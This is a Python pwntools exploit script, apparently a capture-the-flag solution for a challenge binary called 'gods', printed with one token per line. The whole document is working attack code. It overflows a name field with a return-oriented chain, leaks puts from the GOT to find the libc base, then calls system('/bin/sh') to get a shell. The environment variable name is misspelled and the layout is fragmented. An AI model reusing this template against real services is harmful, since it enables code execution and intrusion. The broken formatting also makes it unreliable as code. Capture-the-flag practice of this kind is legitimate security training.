from
pwn
import
*
from
hashlib
import
sha256
import
base64
context.log_level
=
'debug'
context.arch
=
'amd64'
context.os
=
'linux'
def
proof_of_work(sh):
sh.recvuntil(
" == "
)
cipher
=
sh.recvline().strip().decode(
"utf8"
)
proof
=
mbruteforce(
lambda
x: sha256((x).encode()).hexdigest()
=
=
cipher, string.ascii_letters
+
string.digits, length
=
4
, method
=
'fixed'
)
sh.sendlineafter(
"input your ????>"
, proof)
r
=
process(
'./gods'
,env
=
{
"LD_PRELODA"
:
"./libc-2.31.so"
})
elf
=
ELF(
'./gods'
)
libc
=
ELF(
"./libc-2.31.so"
)
put_got
=
elf.got[
"puts"
]
put_plt
=
elf.plt[
'puts'
]
one
=
[
0xe3b2e
,
0xe3b31
,
0xe3b34
]
pdt
=
0x4015d3
def
z():
gdb.attach(r)
r.sendlineafter(
"(*^_^*)"
,
"yes"
)
r.sendlineafter(
"Rank: "
,
str
(
2
))
r.sendlineafter(
"Name: "
,
'a'
*
7
)
r.sendlineafter(
"Rank: "
,
str
(
272
))
r.sendlineafter(
"Name: "
,
"nameles"
)
pd
=
'a'
*
0x18
+
'nameles\x00'
+
'a'
*
8
+
p64(pdt)
+
p64(put_got)
+
p64(put_plt)
+
p64(
0x401236
)
r.sendlineafter(
"what's your name?"
,pd)
r.recvuntil(
"of XDSEC!\n"
)
libcbase
=
u64(r.recvuntil(
"\x7f"
).ljust(
8
,
'\x00'
))
-
libc.sym[
'puts'
]
log.success(
"libcbase:"
+
hex
(libcbase))
onegadget
=
one[
2
]
+
libcbase
binsh
=
libcbase
+
libc.search(
'/bin/sh'
).
next
()
system
=
libcbase
+
libc.sym[
'system'
]
pd
=
'a'
*
0x18
+
'nameles\x00'
+
'a'
*
8
+
p64(
0x40101a
)
+
p64(pdt)
+
p64(binsh)
+
p64(system)
r.sendlineafter(
"what's your name?"
,pd)
r.interactive()